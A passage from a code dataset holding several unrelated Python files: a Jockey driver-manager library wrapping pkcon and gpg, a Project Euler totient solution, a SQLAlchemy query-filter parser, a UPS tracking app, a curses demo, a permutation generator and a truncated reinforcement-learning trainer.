out, re.M | re.S)\n if m:\n # TODO: short description (not accessible with pkcon)\n return (package, m.group(1).replace('\\n', ''))\n else:\n raise ValueError('package %s does not exist' % package)\n\n def package_files(self, package):\n '''Return a list of files shipped by a package.\n\n This should raise a ValueError if the package is not installed.\n '''\n pkcon = subprocess.Popen(['pkcon', '--filter=installed',\n 'get-files', package], stdin=subprocess.PIPE,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n # we send an \"1\" to select package if several versions\n # are available (--filter is broken in at least Fedora 10)\n out = pkcon.communicate('1\\n')[0]\n if pkcon.returncode == 0 and '\\n ' in out:\n return [l.strip() for l in out.splitlines() if l.startswith(' ')]\n else:\n raise ValueError('package %s is not installed' % package)\n\n def install_package(self, package, progress_cb, repository=None,\n fingerprint=None):\n '''Install the given package.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(phase, current, total) is called\n regularly, with 'phase' being 'download' or 'install'. If the callback\n returns True, the installation is attempted to get cancelled (this\n will probably succeed in the 'download' phase, but not in 'install').\n Passes '-1' for current and/or total if time cannot be determined.\n\n If this succeeds, subsequent package_installed(package) calls must\n return True.\n\n If a repository URL is given, that repository is added to the system\n first. The format for repository is distribution specific. This function\n should also download/update the package index for this repository when\n adding it.\n .\n fingerprint, if not None, is a GPG-style fingerprint of that\n repository; if present, this method should also retrieve that GPG key\n from the keyservers, install it into the packaging system, and ensure\n that the repository is signed with that key.\n\n An unknown package should raise a ValueError. Any installation failure\n due to bad packages should be logged, but not raise an exception, as\n this would just crash the backend.\n '''\n\n global akmods_enabled\n logging.debug('install_package akmod status: %s', akmods_enabled)\n print(\"install_package akmod status: %s\" % akmods_enabled)\n\n if repository or fingerprint:\n raise NotImplementedError('PackageKit default implementation does not currently support repositories or fingerprints')\n\n # this will check if the package exists\n self.package_description(package)\n\n pkcon = subprocess.Popen(['pkcon', 'install', '--plain', '-y', package],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # we send an \"1\" to select package if several versions\n # are available\n print >>pkcon.stdin, \"1\\n\"\n\n re_progress = re.compile('Percentage:\\t(\\d+)')\n\n phase = None\n err = line = ''\n fail = False\n while pkcon.poll() == None or line != '':\n line = pkcon.stdout.readline()\n if fail:\n err += line\n if 'Downloading packages' in line:\n phase = 'download'\n elif 'Testing changes' in line or 'Installing packages' in line:\n phase = 'install'\n elif progress_cb and 'Percentage' in line:\n m = re_progress.search(line)\n if m and phase:\n progress_cb(phase, int(m.group(1)), 100)\n else:\n progress_cb(phase or 'download', -1, -1)\n elif 'WARNING' in line:\n fail = True\n elif 'transaction-error' in line or 'failed:' in line:\n err += line\n\n err += pkcon.stderr.read()\n if pkcon.wait() != 0 or not self.package_installed(package):\n logging.error('package %s failed to install: %s' % (package, err))\n\n\n if akmods_enabled:\n self.build_kmod(progress_cb, phase)\n\n self.rebuild_initramfs(progress_cb, phase)\n\n def queue_packages_for_removal(self, packages):\n self.remove_pkg_queue.update(packages)\n\n def remove_package(self, package, progress_cb):\n '''Uninstall the given package.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(current, total) is called\n regularly. Passes '-1' for current and/or total if time cannot be\n determined.\n\n If this succeeds, subsequent package_installed(package) calls must\n return False.\n\n Any removal failure should be raised as a SystemError.\n '''\n progress_cb(0, 100)\n pkcon = subprocess.Popen(['pkcon', '--plain', '--filter=installed',\n 'search', 'name', package],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n re_packages = re.compile(\"Installed\\s+([\\w:.-]+)-([\\w:.]+)-([\\w:.]+)\")\n\n driver_packages = { package }\n driver_packages.update(self.remove_pkg_queue)\n self.remove_pkg_queue.clear()\n\n err = line = ''\n fail = False\n while pkcon.poll() == None or line != '':\n line = pkcon.stdout.readline()\n if fail:\n err += line\n if 'Installed' in line:\n m = re_packages.search(line)\n if m:\n driver_packages.add(m.group(1))\n else:\n logging.error('Cannot extract the package name from %s' % line)\n elif 'WARNING' in line:\n fail = True\n elif 'transaction-error' in line or 'failed:' in line:\n err += line\n\n err += pkcon.stderr.read()\n pkcon.wait()\n\n progress_start = 100\n progress_total = 100 + 100 * len(driver_packages)\n\n logging.debug('Removing packages: %s' % driver_packages)\n for pkg in driver_packages:\n progress_cb(progress_start, progress_total)\n self.remove_single_package(pkg, progress_cb, progress_start,\n progress_total)\n progress_start += 100\n\n if self.package_installed(package):\n raise SystemError('package %s failed to remove: %s' % (package, err))\n\n self.rebuild_initramfs(progress_cb, \"remove\")\n\n def remove_single_package(self, package, progress_cb, progress_start,\n progress_total):\n '''Uninstall the given package.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(current, total) is called\n regularly. Passes progress_start for current and/or progress_total\n for total if time cannot be determined.\n\n If this succeeds, subsequent package_installed(package) calls must\n return False.\n\n Any removal failure should be raised as a SystemError.\n '''\n pkcon = subprocess.Popen(['pkcon', 'remove', '--plain', '-y', package],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n re_progress = re.compile('Percentage:\\t(\\d+)')\n\n err = line = ''\n fail = False\n while pkcon.poll() == None or line != '':\n line = pkcon.stdout.readline()\n if fail:\n err += line\n elif progress_cb and 'Percentage' in line:\n m = re_progress.search(line)\n if m:\n progress_cb(progress_start + int(m.group(1)), progress_total)\n else:\n progress_cb(progress_start, progress_total)\n elif 'WARNING' in line:\n fail = True\n elif 'transaction-error' in line or 'failed:' in line:\n err += line\n\n err += pkcon.stderr.read()\n pkcon.wait()\n if self.package_installed(package):\n raise SystemError('package %s failed to remove: %s' % (package, err))\n\n def has_repositories(self):\n '''Check if package repositories are available.\n\n This might not be the case after a fresh installation, when package\n indexes haven't been downloaded yet.\n '''\n pkcon = subprocess.Popen(['pkcon', 'get-details', 'bash'],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out = pkcon.communicate()[0]\n # PK can't detect package sizes without repositories\n m = re.search(\"^\\s*size:\\s*0 bytes$\", out, re.M)\n return m == None\n\n def update_repository_indexes(self, progress_cb):\n '''Download package repository indexes.\n\n Return True on success, False otherwise.\n\n As this is called in the backend, this must happen noninteractively.\n For progress reporting, progress_cb(current, total) is called\n regularly. Passes '-1' for current and/or total if time cannot be\n determined.\n '''\n pkcon = subprocess.Popen(['pkcon', 'refresh'],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n while pkcon.poll() == None:\n time.sleep(0.3)\n if progress_cb:\n progress_cb(-1, -1)\n pkcon.wait()\n return self.has_repositories()\n\n def packaging_system(self):\n '''Return packaging system.\n\n Currently defined values: apt, yum\n '''\n if os.path.exists('/etc/apt/sources.list') or os.path.exists(\n '/etc/apt/sources.list.d'):\n return 'apt'\n elif os.path.exists('/etc/yum.conf'):\n return 'yum'\n\n raise NotImplementedError('local packaging system is unknown')\n\n def import_gpg_key(self, keyring, fingerprint):\n '''Download and install a GPG key identified by fingerprint.\n\n This verifies that the fingerprint matches, and if so, installs it into\n the given keyring file (will be created if it does not exist).\n\n Raise a SystemError if anything goes wrong.\n '''\n if fingerprint in self._gpg_keyring_fingerprints(keyring):\n return\n\n # gpg likes to write trustdb and temporary files, so create a temporary\n # home directory\n keyid = fingerprint.replace(' ', '')[-8:]\n gpghome = tempfile.mkdtemp()\n default_keyring = os.path.join(gpghome, 'pubring.gpg')\n try:\n # we first import into a temporary keyring, as we need to verify\n # the fingerprint\n gpg = subprocess.Popen(['gpg', '--homedir', gpghome,\n '--no-default-keyring', '--primary-keyring', default_keyring,\n '--keyserver', self.gpg_key_server, '--recv-key', keyid],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n env={'PATH': os.environ.get('PATH', ''),\n 'http_proxy': os.environ.get('http_proxy', '')})\n (out, err) = gpg.communicate()\n\n if fingerprint not in self._gpg_keyring_fingerprints(default_keyring):\n raise SystemError('gpg failed to import key: ' + err)\n\n # now move over to the actual keyring; for multiple matches of the\n # same key ID it would be great to be able to select the one that\n # we want, but unfortunately the GPG command line doesn't really\n # allow that; fortunately key ID conflicts are very rare.\n gpg = subprocess.Popen(['gpg', '--homedir', gpghome,\n '--no-default-keyring', '--primary-keyring', keyring,\n '--import', default_keyring],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n env={'PATH': os.environ.get('PATH', '')})\n (out, err) = gpg.communicate()\n\n if fingerprint not in self._gpg_keyring_fingerprints(default_keyring):\n raise SystemError('gpg failed to import key: ' + err)\n\n logging.debug('import_gpg_key(): Successfully imported key' + keyid)\n except OSError as e:\n raise SystemError('failed to call gpg: ' + str(e))\n finally:\n shutil.rmtree(gpghome)\n\n def _gpg_keyring_fingerprints(self, keyring):\n '''Return list of fingerprints in given keyring'''\n\n # gpg likes to write trustdb and temporary files, so create a temporary\n # home directory\n gpghome = tempfile.mkdtemp()\n try:\n result = []\n gpg = subprocess.Popen(['gpg', '--homedir', gpghome,\n '--no-default-keyring', '--primary-keyring', keyring,\n '--fingerprint'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, env={})\n (out, err) = gpg.communicate()\n if gpg.returncode != 0:\n logging.error('failed to call gpg for reading fingerprints: ' + err)\n return []\n\n for l in out.splitlines():\n if 'fingerprint =' in l:\n result.append(l.split('=')[1].strip())\n return result\n except OSError as e:\n logging.error('failed to call gpg: ' + str(e))\n return []\n finally:\n shutil.rmtree(gpghome)\n\n #\n # The following functions MUST be implemented by distributors\n # Note that apt and yum PackageKit backends currently do not implement\n # RepoSetData(), so those need to remain package system specific\n #\n\n def repository_enabled(self, repository):\n '''Check if given repository is enabled.'''\n\n raise NotImplementedError('subclasses need to implement this')\n\n def ui_help_available(self, ui):\n '''Return if help is available.\n\n This gets the current UI object passed, which can be used to determine\n whether GTK/KDE is used, etc.\n '''\n return False\n\n def ui_help(self, ui):\n '''The UI's help button was clicked.\n\n This should open a help HTML page or website, call yelp with an\n appropriate topic, etc. This gets the current UI object passed, which\n can be used to determine whether GTK/KDE is used, etc.\n '''\n pass\n\n #\n # The following functions have a reasonable default implementation for\n # Linux, but can be tweaked by distributors\n #\n\n def set_backup_dir(self):\n '''Setup self.backup_dir, directory where backup files are stored.\n\n This is used for old xorg.conf, DriverDB caches, etc.\n '''\n self.backup_dir = '/var/cache/jockey'\n if not os.path.isdir(self.backup_dir):\n try:\n os.makedirs(self.backup_dir)\n except OSError as e:\n logging.error('Could not create %s: %s, using temporary '\n 'directory; all your caches will be lost!',\n self.backup_dir, str(e))\n self.backup_dir = tempfile.mkdtemp(prefix='jockey_cache')\n\n def ignored_modules(self):\n '''Return a set of kernel modules which should be ignored.\n\n This particularly effects free kernel modules which are shipped by the\n OS vendor by default, and thus should not be controlled with this\n program. Since this will include the large majority of existing kernel\n modules, implementing this is also important for speed reasons; without\n it, detecting existing modules will take quite long.\n\n Note that modules which are ignored here, but covered by a custom\n handler will still be considered.\n '''\n return set()\n\n def module_blacklisted(self, module):\n '''Check if a module is on the modprobe blacklist.'''\n\n return module in self._module_blacklist or \\\n module in self._module_blacklist_system\n\n def blacklist_module(self, module, blacklist):\n '''Add or remove a kernel module from the modprobe blacklist.\n\n If blacklist is True, the module is blacklisted, otherwise it is\n removed from the blacklist.\n '''\n if blacklist:\n self._module_blacklist.add(module)\n else:\n try:\n self._module_blacklist.remove(module)\n except KeyError:\n return # no need to save the blacklist\n\n self._save_module_blacklist()\n\n def _load_module_blacklist(self):\n '''Initialize self._module_blacklist{,_system}.'''\n\n self._module_blacklist = set()\n self._module_blacklist_system = set()\n\n self._read_blacklist_file(self.module_blacklist_file, self._module_blacklist)\n\n # read other blacklist files (which we will not touch, but evaluate)\n for f in glob('%s/blacklist*' % os.path.dirname(self.module_blacklist_file)):\n if f != self.module_blacklist_file:\n self._read_blacklist_file(f, self._module_blacklist_system)\n\n @classmethod\n def _read_blacklist_file(klass, path, blacklist_set):\n '''Read a blacklist file and add modules to blacklist_set.'''\n\n try:\n f = open(path)\n except IOError:\n return\n\n try:\n fcntl.flock(f.fileno(), fcntl.LOCK_SH)\n for line in f:\n # strip off comments\n line = line[:line.find('#')].strip()\n\n if not line.startswith('blacklist'):\n continue\n\n module = line[len('blacklist'):].strip()\n if module:\n blacklist_set.add(module)\n finally:\n f.close()\n\n def _save_module_blacklist(self):\n '''Save module blacklist.'''\n\n if len(self._module_blacklist) == 0 and \\\n os.path.exists(self.module_blacklist_file):\n os.unlink(self.module_blacklist_file)\n return\n\n os.umask(0o22)\n # create directory if it does not exist\n d = os.path.dirname(self.module_blacklist_file)\n if not os.path.exists(d):\n os.makedirs(d)\n\n f = None\n try:\n f = open(self.module_blacklist_file, 'w')\n fcntl.flock(f.fileno(), fcntl.LOCK_EX)\n for module in sorted(self._module_blacklist):\n print >> f, 'blacklist', module\n except IOError as e:\n logging.error('Failed to write to module blacklist: ' + str(e))\n finally:\n if f:\n f.close()\n\n def _get_os_version(self):\n '''Initialize self.os_vendor and self.os_version.\n '''\n re_distinfo = re.compile('(\\w+) release ([\\d.]+) \\((\\w+)\\)')\n release_file = open('/etc/system-release')\n dinfo_line = release_file.readline()\n distinfo = re_distinfo.search(dinfo_line)\n if distinfo:\n self.os_vendor = distinfo.group(1)\n self.os_version = distinfo.group(2)\n else:\n p = subprocess.Popen(['lsb_release', '-si'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, close_fds=True)\n self.os_vendor = p.communicate()[0].strip()\n p = subprocess.Popen(['lsb_release', '-sr'], stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, close_fds=True)\n self.os_version = p.communicate()[0].strip()\n assert p.returncode == 0\n\n def get_system_vendor_product(self):\n '''Return (vendor, product) of the system hardware.\n\n Either or both can be '' if they cannot be determined.\n\n The default implementation queries sysfs.\n '''\n try:\n vendor = open(os.path.join(self.sys_dir,\n 'class', 'dmi', 'id', 'sys_vendor')).read().strip()\n except IOError:\n vendor = ''\n\n try:\n product = open(os.path.join(self.sys_dir,\n 'class', 'dmi', 'id', 'product_name')).read().strip()\n except IOError:\n product = ''\n\n return (vendor, product)\n\n def notify_reboot_required(self):\n '''Notify the system that a reboot is required.\n\n This can be used as an extra indication when installing a driver which\n needs a reboot to get active.\n\n The default implementation does nothing.\n '''\n pass\n\n def package_header_modaliases(self):\n '''Get modalias map from package headers.\n\n Driver packages may declare the modaliases that they support in a\n package header field, so that they do not need to have a separate\n modalias file list already installed. The map must have the following\n structure: package_name -> module_name -> [list of modaliases]\n\n If this is not supported, simply return an empty dictionary here.\n '''\n return {}\n\n def ssl_cert_file(self):\n '''Get file with trusted SSL certificates.\n\n This is used for downloading GPG key fingerprints for\n openprinting.org driver packages.\n\n Return None if no certificates file is available.\n '''\n for f in self.ssl_cert_file_paths:\n if os.path.exists(f):\n return f\n\n return None\n\n @classmethod\n def has_defaultroute(klass):\n '''Return if there is a default route.\n\n This is a reasonable indicator that online tests can be run.\n '''\n if klass._has_defaultroute_cache is None:\n klass._has_defaultroute_cache = False\n route = subprocess.Popen(['/sbin/route', '-n'],\n stdout=subprocess.PIPE)\n for l in route.stdout:\n if l.startswith('0.0.0.0 '):\n klass._has_defaultroute_cache = True\n route.wait()\n\n return klass._has_defaultroute_cache\n\n _has_defaultroute_cache = None\n\n def current_xorg_video_abi(self):\n '''Return current X.org video ABI.\n\n For an X.org video driver to actually work it must be built against the\n currently used X.org driver ABI, otherwise it will cause crashes. This\n method returns the currently expected video driver ABI from the X\n server. If it is not None, it must match video_driver_abi() of a driver\n package for this driver to be offered for installation.\n\n If this returns None, ABI checking is disabled.\n '''\n return None\n\n def video_driver_abi(self, package):\n '''Return video ABI for an X.org driver package.\n\n For an X.org video driver to actually work it must be built against the\n currently used X.org driver ABI, otherwise it will cause crashes. This\n method returns the video ABI for a driver package. If it is not None,\n it must match current_xorg_video_abi() for this driver to be offered\n for installation.\n\n If this returns None, ABI checking is disabled.\n '''\n return None\n","sub_path":"jockey/oslib.py","file_name":"oslib.py","file_ext":"py","file_size_in_byte":31628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345222560","text":"import math\n\nlim = 10000000\n\nphi = [None] * lim\nsol, mx = None, math.inf\nphi[1] = 1\nfor i in range(2, lim):\n\tif phi[i] is None:\n\t\tphi[i] = i - 1\n\n\t\tfor j in range(2, lim):\n\t\t\tif i * j >= lim:\n\t\t\t\tbreak\n\t\t\telif phi[j] is not None:\n\t\t\t\tq, f = j, i - 1\n\t\t\t\twhile not q % i:\n\t\t\t\t\tq, f = q / i, f * i\n\t\t\t\tphi[i * j] = f * phi[int(q)]\n\t\t\t\n\t\t\t\nfor i in range(2, lim):\n\tif sorted(str(i)) == sorted(str(phi[i])):\n\t\ttx = float(i) / float(phi[i])\n\t\tif tx < mx:\n\t\t\tsol, mx = i, tx\n\nprint(sol)\n\n\n\n","sub_path":"Solution-070.py","file_name":"Solution-070.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"58702195","text":"\"\"\"\n SQLAlchemy-ElasticQuery\n ~~~~~~~~~~~~~~~~~~~~~~~~~\n This extension allow you use the ElasticSearch syntax for search in SQLAlchemy.\n Get a query string and return a SQLAlchemy query\n\n Example query string:\n\n {\n \"filter\" : {\n \"or\" : {\n \"firstname\" : {\n \"equals\" : \"Jhon\"\n },\n \"lastname\" : \"Galt\",\n \"uid\" : {\n \"like\" : \"111111\"\n }\n },\n \"and\" : {\n \"status\" : \"active\",\n \"age\" : {\n \"gt\" : 18\n }\n }\n },\n \"sort\" : {\n \"firstname\" : \"asc\",\n \"age\" : \"desc\"\n },\n \"limit\": 5,\n \"offset\": 2\n }\n\n\"\"\"\n\nfrom flask import json\nfrom sqlalchemy import and_, or_, desc, asc\nfrom sqlalchemy.orm.properties import RelationshipProperty\nfrom sqlalchemy.sql.schema import Table\n\n\"\"\" Valid operators \"\"\"\nOPERATORS = {\n \"like\": lambda f, a: f.like(a),\n \"equals\": lambda f, a: f == a,\n \"is_null\": lambda f: f is None,\n \"is_not_null\": lambda f: f is not None,\n \"gt\": lambda f, a: f > a,\n \"gte\": lambda f, a: f >= a,\n \"lt\": lambda f, a: f < a,\n \"lte\": lambda f, a: f <= a,\n \"in\": lambda f, a: f.in_(a),\n \"not_in\": lambda f, a: ~f.in_(a),\n \"not_equal_to\": lambda f, a: f != a,\n}\n\n\nclass OperatorNotFound(Exception):\n pass\n\n\nclass ElasticQuery(object):\n \"\"\" Magic method \"\"\"\n\n def __init__(self, model, query, enabled_fields=None):\n \"\"\" Initializator of the class 'ElasticQuery' \"\"\"\n self.model = model\n self.query = json.loads(query)\n self.model_query = model.query\n self.enabled_fields = enabled_fields\n\n def search(self):\n filters = self.query\n result = self.model_query\n keys = filters.keys()\n count = 0\n if \"filter\" in keys:\n result = self.parse_filter(filters[\"filter\"])\n if \"sort\" in keys:\n result = result.order_by(*self.sort(filters[\"sort\"]))\n count = result.count()\n page = self.page(\n result, filters.get(\"offset\", None), filters.get(\"limit\", None)\n )\n\n return result, count, page\n\n def page(self, query, offset, limit):\n def apply_page(query=query):\n if offset:\n query = query.offset(offset)\n if limit:\n query = query.limit(limit)\n return query\n\n return apply_page\n\n def parse_filter(self, filters):\n \"\"\" This method process the filters \"\"\"\n try:\n for filter_type, filter_value in filters.items():\n if filter_type == \"or\" or filter_type == \"and\":\n conditions = []\n for field in filters[filter_type]:\n if self.is_field_allowed(field):\n conditions.append(\n self.create_query(\n self.parse_field(field, filter_value[field])\n )\n )\n if filter_type == \"or\":\n self.model_query = self.model_query.filter(or_(*conditions))\n elif filter_type == \"and\":\n self.model_query = self.model_query.filter(and_(*conditions))\n else:\n if self.is_field_allowed(filter_type):\n conditions = self.create_query(\n self.parse_field(filter_type, filter_value)\n )\n self.model_query = self.model_query.filter(conditions)\n except OperatorNotFound:\n return self.model_query\n return self.model_query\n\n def parse_field(self, field, field_value):\n \"\"\" Parse the operators and traduce: ES to SQLAlchemy operators \"\"\"\n if type(field_value) is dict:\n operator = list(field_value)[0]\n if self.verify_operator(operator) is False:\n raise OperatorNotFound()\n value = field_value[operator]\n elif type(field_value) is str:\n operator = u\"equals\"\n value = field_value\n else:\n raise OperatorNotFound()\n return field, operator, value\n\n @staticmethod\n def verify_operator(operator):\n \"\"\" Verify if the operator is valid \"\"\"\n try:\n if hasattr(OPERATORS[operator], \"__call__\"):\n return True\n else:\n return False\n except ValueError:\n return False\n except KeyError:\n return False\n\n def is_field_allowed(self, field):\n if self.enabled_fields:\n return field in self.enabled_fields\n else:\n return True\n\n def create_query(self, attr):\n \"\"\" Mix all values and make the query \"\"\"\n field = attr[0]\n operator = attr[1]\n value = attr[2]\n model = self.model\n\n if \".\" in field:\n field_items = field.split(\".\")\n\n attr = None\n for field_item in field_items:\n attr = getattr(model, field_item, None)\n if isinstance(attr.property, RelationshipProperty):\n model = attr.property.mapper.class_\n secondary = attr.property.secondary\n if isinstance(secondary, Table):\n self.model_query = self.model_query.join(secondary)\n self.model_query = self.model_query.join(model)\n else:\n break\n\n return OPERATORS[operator](attr, value)\n\n return OPERATORS[operator](getattr(model, field, None), value)\n\n def sort(self, sort):\n \"\"\" Sort \"\"\"\n order = []\n for field, direction in sort.items():\n if direction == \"asc\":\n order.append(asc(getattr(self.model, field, None)))\n elif direction == \"desc\":\n order.append(desc(getattr(self.model, field, None)))\n return order\n","sub_path":"openpatch_core/database/elastic_query.py","file_name":"elastic_query.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"348857157","text":"from fooapp import FooApp, start_app\nfrom time import sleep\nfrom datetime import tzinfo\nfrom datetime import datetime\nfrom xml.etree import ElementTree\nfrom ncore.data import FileStore\nfrom ncore.daemon import become_daemon\nfrom ncore.rest import request\nimport logging\nimport sys\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nclass UPS(FooApp):\n name = 'ups'\n config_opts = {}\n\n def __init__(self, user):\n FooApp.__init__(self, user)\n\n try:\n self.numbers = json.loads(self.data['numbers'])\n except:\n self.numbers = []\n\n try:\n self.cache = json.loads(self.data['cache'])\n except:\n self.cache = []\n\n def send(self, msg):\n if not msg['text'] in self.numbers:\n self.numbers.append(msg['text'])\n self.recv('Now tracking %s' % msg['text'])\n else:\n self.numbers.remove(msg['text'])\n self.recv('Removed %s' % msg['text'])\n\n self.data['numbers'] = json.dumps(self.numbers)\n self.update()\n \n def run(self):\n while True:\n self.update()\n sleep(3600)\n \n def update(self):\n if len(self.numbers) == 0:\n return\n\n for num in self.numbers:\n body = '''\n\n %s\n %s\n %s\n\n''' % (self.config['ups']['xmlkey'], self.config['ups']['username'], self.config['ups']['password'])\n body += '''\n\n \n \n %s\n 1.0\n \n Track\n activity\n \n %s\n''' % (num, num)\n \n body = body.encode('ascii')\n\n status, response = request('POST', 'https://wwwcie.ups.com/ups.app/xml/Track', body)\n\n #logging.debug(response)\n\n tree = ElementTree.fromstring(response)\n for status in tree.findall('Shipment/Package/Activity'):\n city = status.findtext('ActivityLocation/Address/City')\n state = status.findtext('ActivityLocation/Address/StateProvinceCode')\n dt = '%s:%s' % (status.findtext('Date'), status.findtext('Time'))\n dt = datetime.strptime(dt, '%Y%m%d:%H%M%S')\n desc = status.findtext('Status/StatusType/Description')\n msg = '%s %s: %s' % (dt.strftime('%a %d - %H:%M'), num, desc)\n if city and state:\n msg = '%s (%s, %s)' % (msg, city, state)\n if not msg in self.cache:\n self.recv(msg)\n self.cache.append(msg)\n self.data['cache'] = json.dumps(self.cache)\n\nif __name__ == '__main__':\n become_daemon()\n start_app(UPS, user=sys.argv[1])\n","sub_path":"ups.py","file_name":"ups.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"433423920","text":"#curses_keycode.py\nimport curses as crs\nfrom curses import panel\nimport os\nimport subprocess\nimport time\n\ndef main(stdscr):\n #initiate\n stdscr.addstr(\"press enter to quit\")\n crs.curs_set(0)\n stdscr = crs.initscr()\n\n while True:\n key = stdscr.getch()\n if key == 10:\n stdscr.clear()\n stdscr.move(8, 12)\n stdscr.addstr(\"you pessed key 10 'enter' guit program\")\n stdscr.getch()\n break\n\n #show the keycode and key\n stdscr.clear() \n stdscr.move(8, 12)\n str_chr = \"The key code of '{}' is {}\". format(chr(key), str(key))\n stdscr.addstr(str_chr)\n\n crs.endwin()\n\ncrs.wrapper(main)\n","sub_path":"curses_keycode.py","file_name":"curses_keycode.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"343664366","text":"#import time\n\ndef func():\n\n f = input()\n\n b = []\n\n for i in range(0, int(f)):\n \n d, e = input().split(\" \")\n\n print (d, e)\n\n for num in b:\n print (num)\n\n#t1 = time.time()\nfunc()\n#t2 = time.time()\n#print (t2-t1)\n\n","sub_path":"Classical_problems/Problem_2/Problem_2.py","file_name":"Problem_2.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"105949037","text":"__author__ = 'Tom'\n\n#Generating Combinatorial objects\n\n#2.2 Permutations, p is a list\n#Arranged lexicographically\ndef next_permutation(p):\n k = len(p)-2\n while p[k] > p[k+1]:\n k -=1\n t = k\n c = p[k]\n while t < len(p)-1 and p[t+1] > c:\n t+=1\n p[k] = p[t]\n p[t] = c\n end = p[k+1:]\n end.reverse()\n answer = p[:k+1]\n answer.extend(end)\n return answer\n\n#assume p is sorted\ndef all_permutations(p):\n print(p)\n end = p[:]\n end.reverse()\n while p != end:\n p = next_permutation(p)\n print(p)\n\n\nall_permutations([0,1,2,3,4])\n\n","sub_path":"Chapter2.py","file_name":"Chapter2.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"22830842","text":"import json\nfrom pprint import pprint\nimport os\nimport numpy as np\nimport pandas as pd\nimport datetime\nimport sys\nfrom torch.distributions import Normal\n\nimport copy\nimport torch\nfrom src.reinforcement.goal_directed_model_based_rl.replay_buffer import ReplayBuffer\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica'], 'size': 10})\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\nrc('text', usetex=True)\n\nclass Logger(object):\n def __init__(self, fname):\n self.terminal = sys.stdout\n self.log_name = fname\n self.log = open(fname, \"a\")\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message)\n\n def flush(self):\n #this flush method is needed for python 3 compatibility.\n #this handles the flush command by doing nothing.\n #you might want to specify some extra behavior here.\n self.log.close()\n self.log = open(self.log_name, \"a\")\n pass\n\n\n# Taken from https://github.com/openai/baselines/blob/master/baselines/ddpg/noise.py, which is\n# based on http://math.stackexchange.com/questions/1287634/implementing-ornstein-uhlenbeck-in-matlab\nclass OrnsteinUhlenbeckActionNoise:\n def __init__(self, mu, sigma=0.003, theta=.15, dt=1e-2, x0=None):\n self.theta = theta\n self.mu = mu\n self.sigma = sigma\n self.dt = dt\n self.x0 = x0\n self.reset()\n\n def __call__(self):\n x = self.x_prev + self.theta * (self.mu - self.x_prev) * self.dt + \\\n self.sigma * np.sqrt(self.dt) * np.random.normal(size=self.mu.shape)\n self.x_prev = x\n return x\n\n def reset(self):\n self.x_prev = self.x0 if self.x0 is not None else np.zeros_like(self.mu)\n\n def __repr__(self):\n return 'OrnsteinUhlenbeckActionNoise(mu={}, sigma={})'.format(self.mu, self.sigma)\n\n\nclass ModelBasedMultiStepBackPropWithEnsembleClassifierV3:\n def __init__(self, agent=None, model_dynamics=None, **kwargs):\n self.agent = agent\n\n self.actor_optim = torch.optim.Adam(agent.parameters(), lr=kwargs['actor_lr'], eps=kwargs['learning_rate_eps'])\n # self.actor_optim = torch.optim.SGD(agent.parameters(), lr=kwargs['actor_lr'])\n\n self.num_epochs_actor = kwargs['num_epochs_actor']\n self.num_epochs_critic = kwargs['num_epochs_critic']\n self.minibatch_size = kwargs['minibatch_size']\n self.clip_grad = kwargs['clip_grad']\n self.device = kwargs['device']\n self.num_rollouts_per_update = kwargs['rollouts_per_update']\n\n self.model_dynamics = model_dynamics\n self.model_dynamics_optim = torch.optim.Adam(self.model_dynamics.parameters(), lr=kwargs['model_dynamics_lr'], eps=kwargs['learning_rate_eps'])\n self.num_epochs_model_dynamics = kwargs['num_epochs_model_dynamics']\n self.num_virtual_rollouts_per_update = kwargs['virtual_rollouts_per_update']\n\n self.replay_buffer = ReplayBuffer(kwargs['buffer_size'])\n self.buffer_trajectories = kwargs['buffer_trajectories']\n self.videos_dir = kwargs['videos_dir']\n self.noise_gamma = 1.0\n self.noise_decay = kwargs['noise_decay']\n\n self.action_penalty = kwargs['action_penalty']\n\n self.cdf_beta = kwargs['cdf_beta']\n\n def train(self, env, num_episodes, dir=None):\n \"\"\"\n Train the agent to solve environment\n :param env: environment object (ReacherEnvironment)\n :param num_episodes: number of episodes (int)\n :return scores: list of scores for each episode (list)\n \"\"\"\n\n action_noise = OrnsteinUhlenbeckActionNoise(mu=np.zeros(env.action_dim), sigma=0.05)\n scores = []\n train_step_i = 0\n\n dt = str(datetime.datetime.now().strftime(\"%m_%d_%Y_%I_%M_%p\"))\n # writer = tf.summary.FileWriter(settings['summary_dir'] + '/summary_md_' + dt, sess.graph)\n video_dir = self.videos_dir + '/video_ensemble_multi_step_V3_' + dt\n if dir is not None:\n video_dir = dir\n try:\n os.makedirs(video_dir)\n except:\n print(\"directory '{}' already exists\")\n\n 